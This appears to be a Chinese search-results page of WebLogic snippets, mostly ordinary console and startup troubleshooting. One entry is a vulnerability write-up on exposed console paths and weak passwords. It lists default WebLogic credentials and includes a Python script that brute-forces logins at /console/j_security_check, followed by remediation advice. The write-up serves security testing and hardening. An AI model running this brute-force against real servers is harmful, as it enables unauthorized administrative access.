-
weblogic控制台报错:已禁用所需的Mbean服务器,这将阻止weblogic管理控制台的正常操作
2020-01-21 15:58:21有套应用环境,weblogic控制台端口号是7010,浏览器登录后报错: 已禁用所需的Mbean服务器,这将阻止weblogic管理控制台的正常操作 请在该域的配置中启用DomainRuntimeMBean服务器和Edit ...通常weblogic控制台都...有套应用环境,weblogic控制台端口号是7010,浏览器登录后报错:
已禁用所需的Mbean服务器,这将阻止weblogic管理控制台的正常操作
请在该域的配置中启用DomainRuntimeMBean服务器和Edit MBean服务器
由于自身对weblogic也不熟悉,看报错的意思,下意识觉得是不是哪个地方禁用了这个什么MBean,鼓弄了半天也没搞定。
通常weblogic控制台都是用的默认的7001端口,感觉是不是由于换了端口导致的。
一直盯着startWeblogic.sh和setDomain.sh这两个文件看,也没看出个什么鬼来,无奈之下,把目光放到了startManagedweblogic.sh上,开头便看到:
ADMIN_URL=“http://zhglapp1:7010”
看了其它几台weblogic控制台正常的服务器,也都是用的主机名,权当无奈之举,改成了:
ADMIN_URL=“http://127.0.0.1:7010”
嘿嘿,竟然好了
-------------------------------------------
问我原因,暂时也搞不明白。简单复盘一下,其实对于这样的问题,很多时候会被错误信息误导以及把问题想的复杂了。以我这边的开发人员的水平,绝大多数停留在简单使用weblogic的层面,日常部署个程序啥的,不会修改过于复杂的东西。
如果从这个角度出发,就说明
-
webLogic漏洞分析—控制台路径泄露与弱口令
2020-05-10 17:36:12对于weblogic控制台来讲:Weblogic有一个Web端的管理控制台,关于Weblogic的操作、Web服务的配置及程序管理等都可以通过这个控制台进行操作。 1.2 漏洞概述 由于各种web中间件默认路径可能都存在控制台页面路径1 漏洞概述
1.1 基础知识
要了解这个漏洞首先我们要了解一个概念,什么是web服务器控制台,它有什么作用和影响:
对于weblogic控制台来讲:Weblogic有一个Web端的管理控制台,关于Weblogic的操作、Web服务的配置及程序管理等都可以通过这个控制台进行操作。
1.2 漏洞概述
由于各种web中间件默认路径可能都存在控制台页面路径泄露的情况,这就是我们的一个攻击面,一旦我们可以获取到这个控制台权限,我们就可以对网站进行一些高危操作。
风险等级:
【高危】:可访问默认中间件控制台,且能过成功获取 shell。
【中危】:可访问默认中间件控制台,并成功登录,但无法获取 shell。
【低危】:可访问默认中间件控制台,但无法登录且无法执行危险操作。
2 漏洞原理分析
1:如果产品部署了控制台功能,并且模块路径为默认路径,就存在控制台路径的泄露问题。
Weblogic控制台默认路径:http://127.0.0.1:7001/console/login/LoginForm.jsp2:如果控制台的页面账户密码为默认账户名和密码,则存在弱口令的问题。
Welogic默认账户名和密码:WebLogic’, ‘weblogic’, ‘Oracle@123’, ‘password’, ‘system’, ‘Administrator’, ‘admin’, ‘security’, ‘joe’, ‘wlcsystem’, ‘wlpisystem’3 漏洞复现
通过上述分析,我们发现可以通过探访web服务器控制台界面的默认路径,来查看是否开启了这个控制台页面,如果存在,我们再进行默认密码爆破。
3.1 环境搭建
两种方式:1:下载weblogic jar包安装 2:使用dockers镜像
Weblogic版本:10.3.6(11g)
3.2 漏洞利用
Step1:手动登录或使用脚本探索weblogic控制台默认路径
1:方式一:手动登录:
http://127.0.0.1:7001/console/login/LoginForm.jsp
2:方式二:使用脚本:
Step2:对账户密码进行爆破方式一:使用脚本进行爆破
def weakPasswd(self): """weak password""" pwddict = ['WebLogic', 'weblogic', 'Oracle@123', 'password', 'system', 'Administrator', 'admin', 'security', 'joe', 'wlcsystem', 'wlpisystem'] for user in pwddict: for pwd in pwddict: data = { 'j_username':user, 'j_password':pwd, 'j_character_encoding':'UTF-8' } req = requests.post(self.url+':7001/console/j_security_check', data=data, allow_redirects=False, verify=False) if req.status_code == 302 and 'console' in req.text and 'LoginForm.jsp' not in req.text: print('[+] WebLogic username: '+user+' password: '+pwd)
4 漏洞修复
1:如果远程部署功能的确需要,建议修改默认的模块名称。
2:修改控制台密码5 其他
这个控制台密码的加密方式为weblogic密码使用AES(老版本3DES)加密,对称加密可解密,只需要找到用户的密文与加密时的密钥即可;则会部分我们后续再进行操作
-
weblogic服务启动,未加载项目
2014-11-26 05:52:01再一次不正常关机后,MyEclipse中启动weblogic控制台显示到Server started in RUNNING mode时,不再显示加载应用的信息。 控制台打印信息如下: <AdminServer> <main> <<WLS Kernel>> <> <> <1416979807418> ... -
WebLogic服务启动报错:Authentication denied: Boot identity not valid
2018-11-19 22:09:00有时候启动weblogic服务闪退,不知道是什么原因,可以在cmd中启动服务,会显示报错信息。 原因:这次报错是因为上次服务启动后,在控制台中改了weblogic的密码,隔天启动服务后,出现了此错误。 一开始以为是jdk...有时候启动weblogic服务闪退,不知道是什么原因,可以在cmd中启动服务,会显示报错信息。
-
原因:这次报错是因为上次服务启动后,在控制台中改了weblogic的密码,隔天启动服务后,出现了此错误。
一开始以为是jdk有问题,检查了一次发现并没有问题,便到日志中查看错误信息。发现weblogic的用户名/密码验证出现了问题。 -
解决方法:清空当前配置文件中的用户名密码,并重新设置他们;
修改文件时,请先做好备份工作 -
修改boot.properties,把username/password后面的内容都删掉;
所在路径:
/home/weblogic/Oracle/Middleware/user_projects/domains/mydomain/servers/AdminServer/security
删掉后重新启动服务即可。
参考:https://blog.csdn.net/qq_36501591/article/details/79992690
-
-
weblogic监控
2011-02-19 22:32:31主要内容 •1、WebLogic服务的监控 •2、WebLogic性能优化 •3、UNIX操作命令介绍 WebLogic服务的监控 ...如不为空闲,看看是什么样的请求在占用线程。 Console-->server-->myserver-->右键菜单ViewExecuteThreads -
weblogic服务启动报错,提示缓存刷新异常,清缓存后还是报同样的错误
2019-07-17 18:05:00求教各位大佬,今天部署weblogic服务,启动服务报错,缓存刷新异常,各种清缓存重启都不行,可以打开控制台,就是打不开页面,这可能是什么情况,应该怎么解决呢?跪求![图片说明]... -
Weblogic 数据源 连接池占满的一种解决思路
2016-11-25 18:10:01如果一句一句去找哪个sql出了问题是比较麻烦的特别是在别人的代码上找,这个时候可以点击Weblogic控制台,进入环境-----服务器选择服务 点击监视线程,可以看到什么类型的请求线程异常再去找代码会轻松很多连接池占满比然后会有数据库连接泄露或者未释放。如果一句一句去找哪个sql出了问题是比较麻烦的特别是在别人的代码上找,这个时候可以点击Weblogic控制台,进入环境-----服务器选择服务 点击监视线程,可以看到什么类型的请求请求地址没有释放线程异常再去找代码会轻松很多
-
对于weblogic在myeclipse里启动出现异常的问题
2009-08-21 15:41:00哇咔咔,问题终于解决了! 而且改变了我一个观念,以前我遇见问题... 先说一下我的问题:我通过weblogic控制台把一个java工程部署上以后,在myeclipse里做了详细的设置,把weblogic设置为要用的,并且JDK什么的都... -
weblogic日志的问题
2008-11-10 17:16:13想实现下面的功能,将weblogic的stdout输出到某文件,当到达一定大小的时候(比如5M)自动新建一个日志文件. ...不知道你用的是什么版本的,我的这个目录没有这个wllog4j.jar 这个文件..汗,能否提供个啊 -
【赵强老师】使用Weblogic的WLST工具
2021-01-22 11:12:25一、什么是Weblogic WLST? WebLogic 脚本工具 (WebLogic Scripting Tool , WLST) 是一种命令行脚本界面,系统管理员和操作员用它来监视和管理 WebLogic Server 实例以及域。WLST提供以下功能: 新建WLS域 检查和... -
weblogic9.2部署文件
2009-01-08 14:49:01部署的时候要怎么部署,我部署是通过控制台 部署-安装-选择路径-然后选中相应的包,貌似只能选择到project的上一层目录 现在是 web project web-inf 选到web的时候就选不下去了.. [b]问题补充:[/b] ... -
经典JAVA.EE企业应用实战.基于WEBLOGIC_JBOSS的JSF_EJB3_JPA整合开发.pdf
2013-02-18 10:06:32所使用的应用服务器是jboss 5.1和weblogic 11g,详细介绍了这两种应用服务器的安装和使用,以及如何在两大主流服务器上安装、部署java ee应用。 本书内容主要包括三部分,第一部分介绍java ee开发的基础知识,... -
关于JMS的一个怪异的问题(高分求教)
2009-01-18 16:06:48结果信没法出去,程序出现异常,weblogic控制台开始不停的输出异常信息,然后我就把weblogic给停了。 第二天,我再启动weblogic,控制台上又开始疯狂的输出异常,感觉就像死循环。 因为我们要进行单体测试,所以... -
java面试题
2018-01-01 15:35:1528. JSP和Servlet有哪些相同点和不同点,他们之间的联系是什么? 15 29. Anonymous Inner Class (匿名内部类) 是否可以extends(继承)其它类,是否可以implements(实现)interface(接口)? 15 30. 构造器Constructor... -
超级有影响力霸气的Java面试题大全文档
2012-07-18 09:47:0427、GC是什么? 为什么要有GC? GC是垃圾收集的意思(Gabage Collection),内存处理是编程人员容易出现问题的地方,忘记或者错误的内存回收会导致程序或系统的不稳定甚至崩溃,Java提供的GC功能可以自动监测对象... -
java 面试题 总结
2009-09-16 08:45:3424、GC是什么? 为什么要有GC? GC是垃圾收集的意思(Gabage Collection),内存处理是编程人员容易出现问题的地方,忘记或者错误的内存回收会导致程序或系统的不稳定甚至崩溃,Java提供的GC功能可以自动监测对象... -
JAVA上百实例源码以及开源项目源代码
2018-12-11 17:07:42J2ME优化压缩PNG文件 4个目标文件 内容索引:JAVA源码,综合应用,J2me游戏,PNG,图形处理 这是个J2ME控制台程序,它能剔除PNG文件中的非关键数据段,减少文件大小从而达到压缩图片的目的。而图片的质量并不会受到损失... -
JAVA上百实例源码以及开源项目
2016-01-03 17:37:40这是个J2ME控制台程序,它能剔除PNG文件中的非关键数据段,减少文件大小从而达到压缩图片的目的。而图片的质量并不会受到损失。使用时候只需在控制台窗口执行jar就可以了。 Java 3DMenu 界面源码 5个目标文件 ... -
springboot参考指南
2016-07-21 12:00:22控制台输出 iii. 25.3. 文件输出 iv. 25.4. 日志级别 v. 25.5. 自定义日志配置 v. 26. 开发Web应用 i. 26.1. Spring Web MVC框架 i. 26.1.1. Spring MVC自动配置 ii. 26.1.2. HttpMessageConverters Spring Boot...